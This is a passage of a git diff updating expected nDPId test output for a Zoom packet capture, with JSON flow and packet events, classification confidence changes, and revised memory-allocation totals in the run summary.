{"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11812,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1642965500053,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA48ZAAAEAB7HzAqAGykMNJmgMD6XYAAAAARQAESyuFQAAxEX1lkMNJmsCoAbIiYeztBDcAAA=="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11815,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1642965500054,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1642965500054,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4fvIAAEABXxvAqAGykMNJmgMD6XYAAAAARQAESyuHQAAxEX1jkMNJmsCoAbIiYeztBDcAAA=="} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":1642965460359,"flow_last_seen":1642965500043,"flow_idle_time":200000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2230,"flow_first_seen":1642965460219,"flow_last_seen":1642965500203,"flow_idle_time":200000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":368542,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 
00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8731,"flow_first_seen":1642965459595,"flow_last_seen":1642965500185,"flow_idle_time":200000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1297,"flow_tot_l4_payload_len":7999131,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} -00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1642965500049,"flow_last_seen":1642965500203,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":972,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1642965500049,"flow_last_seen":1642965500203,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":972,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","packets-captured":11977,"packets-processed":11977,"total-skipped-flows":0,"total-l4-payload-len":8482462,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":5,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":38,"global_ts_msec":1642965502810} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 11977/11977 @@ -44,9 +44,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6234209 bytes -~~ total memory freed........: 6234209 bytes -~~ total allocations/frees...: 130117/130117 +~~ total memory allocated....: 6367843 bytes +~~ total memory freed........: 6367843 bytes +~~ total allocations/frees...: 132879/132879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1367 chars -- cgit v1.2.3